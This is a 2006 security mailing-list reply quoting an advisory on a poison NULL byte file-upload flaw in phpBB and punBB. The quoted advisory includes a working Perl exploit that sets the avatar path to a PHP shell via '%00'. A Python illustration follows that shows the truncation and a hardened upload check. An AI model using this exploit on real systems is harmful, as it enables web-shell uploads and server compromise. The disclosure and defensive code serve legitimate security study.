Date: Tue, 12 Sep 2006 13:58:19 +0200
From: Jerome Athias <jerome.athias@...e.fr>
To: 3APA3A <3APA3A@...URITY.NNOV.RU>
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability

Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf

(French translation: https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf)

Best regards
/JA

3APA3A wrote:
> Author: ShAnKaR
> Title: multiple PHP application poison NULL byte vulnerability
> Applications: phpBB 2.0.21, punBB 1.2.12
> Threat Level: Critical
> Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
>
> The poison NULL byte vulnerability for Perl CGI applications was described
> in [1]. ShAnKaR noted that the same vulnerability also affects various
> PHP applications. Examples of vulnerable applications are phpBB and
> punBB.
>
> The vulnerability can be used to upload or replace arbitrary files on the
> server, e.g. PHP scripts, by adding a "poison NULL" (%00) to the filename.
>
> In the case of phpBB and punBB, the vulnerability can be exploited by
> changing the location of the avatar file and uploading an avatar file with
> PHP code in its EXIF data.
>
> A PoC exploit to change the avatar file location for phpBB:
>
> #!/usr/bin/perl -w
>
> use HTTP::Cookies;
> use LWP;
> use URI::Escape;
> unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
> my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
> $ua->cookie_jar( HTTP::Cookies->new());
>
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
> my $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> my $res = $ua->request($req);
>
> $res=$ua->get('http://'.$ARGV[0].'/login.php');
> $content=$res->content;
> $content=~ m/true&amp;sid=([^"]+)"/g;
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
>
> $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
> $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
>
>
> References:
> [1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
>

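The mechanism behind the advisory is a mismatch between two views of the same string: the PHP application checks a path that still contains everything after the %00, while the C library underneath stops reading at the first NUL byte. The Python snippet below is an added illustration for this thread (it is neither the advisory's PoC nor phpBB or punBB code) of that mismatch and of the checks an upload handler should perform instead: refuse NUL bytes in any path component, accept only a bare file name, allow-list the extension, and confine the canonical destination to a fixed avatar root. The directory name, root path and file names are constructed sample values. PHP itself only started rejecting embedded NULs in filesystem paths in 5.3.4, so on older installations the application-level check was the only line of defence.

```python
import os
import posixpath

# Constructed sample values; nothing here comes from phpBB or punBB.
AVATAR_ROOT = "/var/www/forum/images/avatars"
ALLOWED_EXTENSIONS = {".gif", ".jpg", ".jpeg", ".png"}


def c_string_view(path: str) -> str:
    """Model how a C library call sees a path handed over by PHP.

    C strings end at the first NUL byte, so everything after it is silently
    dropped. This is the truncation the advisory relies on: PHP before 5.3.4
    passed such paths through to the filesystem unchanged.
    """
    nul = path.find("\0")
    return path if nul < 0 else path[:nul]


def naive_destination(avatar_dir: str, filename: str) -> str:
    """The weak pattern: trust the configured directory, join, and check the
    extension of the string the application sees (not the one the OS sees)."""
    dest = avatar_dir + "/" + filename
    if posixpath.splitext(dest)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return dest


def safe_destination(avatar_dir: str, filename: str) -> str:
    """Hardened version: reject NULs in both inputs, refuse path components in
    the file name, allow-list the extension, and confine the canonical result
    to AVATAR_ROOT. Returns the canonical absolute path or raises ValueError."""
    for value in (avatar_dir, filename):
        if "\0" in value:
            raise ValueError("NUL byte in path")
    name = posixpath.basename(filename)
    if name != filename or name in ("", ".", ".."):
        raise ValueError("file name must be a single path component")
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    root = os.path.realpath(AVATAR_ROOT)
    full = os.path.realpath(os.path.join(os.path.realpath(avatar_dir), name))
    # commonpath on the canonical paths catches both symlink and ../ escapes.
    if os.path.commonpath([root, full]) != root:
        raise ValueError("destination escapes the avatar root")
    return full


def rejects(avatar_dir: str, filename: str) -> bool:
    """True if safe_destination refuses the (directory, file name) pair."""
    try:
        safe_destination(avatar_dir, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # A configured avatar directory carrying a NUL: the weak check passes
    # because the joined string still ends in ".gif" ...
    poisoned = naive_destination("images/avatars/shell.php\0", "1234.gif")
    print("application sees:", repr(poisoned))
    # ... but the filesystem would open "images/avatars/shell.php".
    print("filesystem sees: ", repr(c_string_view(poisoned)))
    print("hardened check rejects it:",
          rejects(AVATAR_ROOT + "/shell.php\0", "1234.gif"))
```

The important design choice is that `safe_destination` validates the configured directory as untrusted input too, since in the advisory the NUL arrives through an admin setting rather than the uploaded file name; confining the canonical path to a fixed root means a poisoned or relocated avatar directory is refused regardless of who set it.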